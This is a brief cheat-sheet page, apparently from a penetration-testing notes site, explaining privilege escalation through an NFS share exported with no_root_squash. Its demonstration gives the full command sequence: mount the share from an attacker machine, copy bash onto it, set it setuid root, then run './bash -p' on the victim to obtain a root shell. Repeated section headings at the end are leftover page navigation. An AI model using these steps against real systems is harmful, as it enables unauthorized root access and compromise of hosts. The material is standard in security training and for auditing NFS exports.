[📝] NFS no_root_squash privesc

Introduction

In some environments, the root user on a networked file system is treated as an unprivileged user. This is known as “root squashing.” If root squashing is disabled, an attacker who gains access to an unprivileged account on the file system may be able to escalate their privileges to root.

Demonstration

Attacker machine

Create a directory named /tmp/mount:

mkdir /tmp/mount

Mount the network file system to /tmp/mount:

mount -t nfs <IP>:<SHARED_FOLDER> /tmp/mount

Copy the /bin/bash binary from the attacker’s system to the mounted file system:

cp /usr/bin/bash /tmp/mount

Change the permissions on the copied bash binary to make it setuid root:

chmod +s bash

Victim machine

Execute the modified bash binary with the -p option, which causes bash to open a root shell:

./bash -p

Introduction#

Demonstration#

Attacker machine#

Victim machine#

Introduction

Demonstration

Attacker machine

Victim machine